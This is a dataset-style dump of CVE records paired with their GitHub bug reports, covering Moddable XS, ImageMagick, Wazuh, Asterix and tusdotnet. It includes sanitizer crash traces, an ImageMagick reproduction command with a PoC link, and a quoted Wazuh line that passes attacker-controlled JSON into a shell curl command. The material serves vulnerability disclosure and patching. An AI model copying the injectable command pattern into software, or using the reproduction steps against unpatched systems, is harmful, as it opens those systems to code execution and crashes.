/home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #199 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #200 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #201 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #202 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #203 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #204 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #205 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #206 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #207 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #208 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #209 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #210 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #211 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #212 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #213 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #214 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #215 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #216 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #217 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #218 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #219 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #220 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #221 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #222 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #223 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #224 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #225 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #226 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #227 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #228 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #229 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #230 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #231 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #232 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #233 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #234 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #235 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #236 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #237 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #238 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #239 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #240 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #241 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #242 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #243 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #244 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #245 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #246 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #247 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #248 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 #249 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267 #250 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355 #251 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361 SUMMARY: AddressSanitizer: stack-overflow /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:265 fxBinaryExpressionNodeDistribute ==6025==ABORTING ```
stack-overflow(fxBinaryExpressionNodeDistribute)
https://api.github.com/repos/Moddable-OpenSource/moddable/issues/587/comments
2
2021-02-26T10:36:48Z
2021-03-23T22:52:57Z
https://github.com/Moddable-OpenSource/moddable/issues/587
817,241,227
587
2,799
CVE-2021-3962
2021-11-19T17:15:08.733
A flaw was found in ImageMagick where it did not properly sanitize certain input before using it to invoke convert processes. This flaw allows an attacker to create a specially crafted image that leads to a use-after-free vulnerability when processed by ImageMagick. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2023196" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/82775af03bbb10a0a1d0e15c0156c75673b4525e" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/4446" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2023196" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/82775af03bbb10a0a1d0e15c0156c75673b4525e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/4446" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.1.0-14:*:*:*:*:*:*:*", "matchCriteriaId": "1F791E1D-6A0A-47F0-8219-51EE22C2F467", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/ImageMagick/ImageMagick/issues/4446
[ "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.0-14 ### Operating system Linux ### Operating system, version and so on OS: Ubuntu 18.04.6 LTS Version: ImageMagick 7.1.0-14 Q16-HDRI x86_64 2021-10-28 https://imagemagick.org Copyright: (C) 1999-2021 ImageMagick Studio Delegates (built-in): fontconfig freetype jng jpeg lzma pangocairo png x xml zlib Compiler: gcc (4.2) ### Description Hello, We are currently working on fuzz testing feature, and we found a **heap-use-after-free** on **magick**. ### Steps to Reproduce build it `./configure --disable-shared && make && make install ` run it ` ./magick convert -adjoin -alpha copy -antialias -append -auto-gamma -auto-level -auto-orient poc /dev/null ` output ### free(): double free detected in tcache 2 When I compile in ASAN mode ` ./magick convert -adjoin -alpha copy -antialias -append -auto-gamma -auto-level -auto-orient poc /dev/null ` ================================================================= ==11927==ERROR: AddressSanitizer: heap-use-after-free on address 0x60f000000580 at pc 0x000000f0f98c bp 0x7ffe3d8a7fd0 sp 0x7ffe3d8a7fc8 READ of size 8 at 0x60f000000580 thread T0 #0 0xf0f98b in RelinquishDCMMemory /root/fuzz/target/imagemagick/ImageMagick/coders/dcm.c:3039:20 #1 0xf08eb8 in ReadDCMImage /root/fuzz/target/imagemagick/ImageMagick/coders/dcm.c:4002:11 #2 0x65b638 in ReadImage /root/fuzz/target/imagemagick/ImageMagick/MagickCore/constitute.c:563:15 #3 0x6602d3 in ReadImages /root/fuzz/target/imagemagick/ImageMagick/MagickCore/constitute.c:955:9 #4 0x15bd745 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:611:18 #5 0x177d150 in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14 #6 0x5f9924 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10 #7 0x5f9924 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10 #8 0x7f35dfd66bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x549e99 in _start (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x549e99) 0x60f000000580 is located 144 bytes inside of 168-byte region [0x60f0000004f0,0x60f000000598) freed by thread T0 here: #0 0x5c4af2 in free (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x5c4af2) #1 0xf0f82c in RelinquishMagickMemory /root/fuzz/target/imagemagick/ImageMagick/MagickCore/memory.c:1167:3 #2 0xf0f82c in RelinquishDCMMemory /root/fuzz/target/imagemagick/ImageMagick/coders/dcm.c:3043:35 #3 0xf08e0b in ReadDCMImage /root/fuzz/target/imagemagick/ImageMagick/coders/dcm.c:3999:9 #4 0x65b638 in ReadImage /root/fuzz/target/imagemagick/ImageMagick/MagickCore/constitute.c:563:15 #5 0x6602d3 in ReadImages /root/fuzz/target/imagemagick/ImageMagick/MagickCore/constitute.c:955:9 #6 0x15bd745 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:611:18 #7 0x177d150 in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14 #8 0x5f9924 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10 #9 0x5f9924 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10 #10 0x7f35dfd66bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 previously allocated by thread T0 here: #0 0x5c4d5d in malloc (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x5c4d5d) #1 0xefb803 in AcquireMagickMemory /root/fuzz/target/imagemagick/ImageMagick/MagickCore/memory.c:558:10 #2 0xefb803 in ReadDCMImage /root/fuzz/target/imagemagick/ImageMagick/coders/dcm.c:3142:33 #3 0x65b638 in ReadImage /root/fuzz/target/imagemagick/ImageMagick/MagickCore/constitute.c:563:15 #4 0x6602d3 in ReadImages /root/fuzz/target/imagemagick/ImageMagick/MagickCore/constitute.c:955:9 #5 0x15bd745 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:611:18 #6 0x177d150 in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14 #7 0x5f9924 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10 #8 0x5f9924 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10 #9 0x7f35dfd66bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-use-after-free /root/fuzz/target/imagemagick/ImageMagick/coders/dcm.c:3039:20 in RelinquishDCMMemory Shadow bytes around the buggy address: 0x0c1e7fff8060: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff8070: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa 0x0c1e7fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff8090: 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fd fd 0x0c1e7fff80a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd =>0x0c1e7fff80b0:[fd]fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==11927==ABORTING ### Images [poc.zip](https://github.com/ImageMagick/ImageMagick/files/7489944/poc.zip)
heap-use-after-free in magick at dcm.c RelinquishDCMMemory
https://api.github.com/repos/ImageMagick/ImageMagick/issues/4446/comments
5
2021-11-06T05:20:44Z
2021-11-23T07:52:32Z
https://github.com/ImageMagick/ImageMagick/issues/4446
1,046,416,827
4,446
2,800
CVE-2021-44079
2021-11-22T07:15:07.017
In the wazuh-slack active response script in Wazuh 4.2.x before 4.2.5, untrusted user agents are passed to a curl command line, potentially resulting in remote code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/wazuh/wazuh/issues/10858" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/wazuh/wazuh/issues/10858#issuecomment-991118254" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/wazuh/wazuh/pull/10809" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/wazuh/wazuh/issues/10858" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/wazuh/wazuh/issues/10858#issuecomment-991118254" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/wazuh/wazuh/pull/10809" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "matchCriteriaId": "07EA0D69-0063-4F4A-83A9-65FB55D7B714", "versionEndExcluding": "4.2.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.2.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "77" ]
77
https://github.com/wazuh/wazuh/issues/10858
[ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "wazuh", "wazuh" ]
|Wazuh version|Component|Install type|Install method|Platform|Fix| |---|---|---|---|---|---| | 4.2.0 | Active-response script | Manager/Agent | Packages | CentOS 7 |#10809| This issue was reported by @rk700. We found a command injection bug in the active-response script [wazuh-slack](https://github.com/wazuh/wazuh/blob/master/src/active-response/wazuh-slack.c). The alert JSON data is put in the shell command line as POST body for `curl`: ```c snprintf(system_command, OS_MAXSTR -1, "curl -H \"Accept: application/json\" -H \"Content-Type: application/json\" -d '%s' %s", output_str, site_url); ``` However, the raw log line which could be partially controlled by an attacker is also included in the JSON data. Single quote in JSON is not escaped and therefore could be used to truncate the command: ``` -d '<json data that could be partially controlled>' ``` ## Remediation 1. Prevent default Active Response tools from executing arbitrary code. Replace `system()` function call with `wpopenv()`, which executes subprocesses without a shell. |Active response tool|Platform| |---|---| |`disable-account`|UNIX| |`firewalld-drop`|Linux| |`netsh`|Windows| |`route-null`|Windows| |`wazuh-slack`|UNIX| 2. Sanitize the AR payload by the manager for agents between 4.2.0 and 4.2.4, in order to prevent this hazard in outdated agents. Convert control characters into their hexadecimal notation: |Character|Conversion| |---|---| |Exclamation mark (`!`)|`\x21`| |Dollar (`$`)|`\x24`| |Single quote (`'`)|`\x27`| |Backtick (`` ` ``)|`\x60`|
Active response tools allow arbitrary code execution
https://api.github.com/repos/wazuh/wazuh/issues/10858/comments
13
2021-11-16T09:26:07Z
2021-12-10T16:54:42Z
https://github.com/wazuh/wazuh/issues/10858
1,054,644,643
10,858
2,801
CVE-2021-44079
2021-11-22T07:15:07.017
In the wazuh-slack active response script in Wazuh 4.2.x before 4.2.5, untrusted user agents are passed to a curl command line, potentially resulting in remote code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/wazuh/wazuh/issues/10858" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/wazuh/wazuh/issues/10858#issuecomment-991118254" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/wazuh/wazuh/pull/10809" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/wazuh/wazuh/issues/10858" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/wazuh/wazuh/issues/10858#issuecomment-991118254" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/wazuh/wazuh/pull/10809" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "matchCriteriaId": "07EA0D69-0063-4F4A-83A9-65FB55D7B714", "versionEndExcluding": "4.2.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.2.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "77" ]
77
https://github.com/wazuh/wazuh/issues/10858#issuecomment-991118254
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "wazuh", "wazuh" ]
|Wazuh version|Component|Install type|Install method|Platform|Fix| |---|---|---|---|---|---| | 4.2.0 | Active-response script | Manager/Agent | Packages | CentOS 7 |#10809| This issue was reported by @rk700. We found a command injection bug in the active-response script [wazuh-slack](https://github.com/wazuh/wazuh/blob/master/src/active-response/wazuh-slack.c). The alert JSON data is put in the shell command line as POST body for `curl`: ```c snprintf(system_command, OS_MAXSTR -1, "curl -H \"Accept: application/json\" -H \"Content-Type: application/json\" -d '%s' %s", output_str, site_url); ``` However, the raw log line which could be partially controlled by an attacker is also included in the JSON data. Single quote in JSON is not escaped and therefore could be used to truncate the command: ``` -d '<json data that could be partially controlled>' ``` ## Remediation 1. Prevent default Active Response tools from executing arbitrary code. Replace `system()` function call with `wpopenv()`, which executes subprocesses without a shell. |Active response tool|Platform| |---|---| |`disable-account`|UNIX| |`firewalld-drop`|Linux| |`netsh`|Windows| |`route-null`|Windows| |`wazuh-slack`|UNIX| 2. Sanitize the AR payload by the manager for agents between 4.2.0 and 4.2.4, in order to prevent this hazard in outdated agents. Convert control characters into their hexadecimal notation: |Character|Conversion| |---|---| |Exclamation mark (`!`)|`\x21`| |Dollar (`$`)|`\x24`| |Single quote (`'`)|`\x27`| |Backtick (`` ` ``)|`\x60`|
Active response tools allow arbitrary code execution
https://api.github.com/repos/wazuh/wazuh/issues/10858/comments
13
2021-11-16T09:26:07Z
2021-12-10T16:54:42Z
https://github.com/wazuh/wazuh/issues/10858
1,054,644,643
10,858
2,802
CVE-2021-44144
2021-11-22T21:15:07.507
Croatia Control Asterix 2.8.1 has a heap-based buffer over-read, with additional details to be disclosed at a later date.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/CroatiaControlLtd/asterix/issues/183" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/CroatiaControlLtd/asterix/issues/183" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:crocontrol:asterix:2.8.1:*:*:*:*:*:*:*", "matchCriteriaId": "AD6ADACC-12A9-41D5-A46A-764BD03E2328", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/CroatiaControlLtd/asterix/issues/183
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "CroatiaControlLtd", "asterix" ]
👋 Hello, @dsalantic, @ifsnop, @bbertrand - a potential medium severity Heap-based Buffer Overflow vulnerability in your repository has been disclosed to us. #### Next Steps 1️⃣ Visit **https://huntr.dev/bounties/1-other-CroatiaControlLtd/asterix** for more advisory information. 2️⃣ **[Sign-up](https://huntr.dev/)** to validate or speak to the researcher for more assistance. 3️⃣ Propose a patch or outsource it to our community - whoever fixes it gets paid. --- #### Confused or need more help? - Join us on our **[Discord](https://huntr.dev/discord)** and a member of our team will be happy to help! 🤗 - Speak to a member of our team: @JamieSlome --- *This issue was automatically generated by [huntr.dev](https://huntr.dev) - a bug bounty board for securing open source code.*
🚨 Potential Heap-based Buffer Overflow
https://api.github.com/repos/CroatiaControlLtd/asterix/issues/183/comments
2
2021-05-21T21:15:06Z
2021-11-23T08:30:49Z
https://github.com/CroatiaControlLtd/asterix/issues/183
898,533,228
183
2,803
CVE-2021-44150
2021-11-22T22:15:07.350
The client in tusdotnet through 2.5.0 relies on SHA-1 to prevent spoofing of file content.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
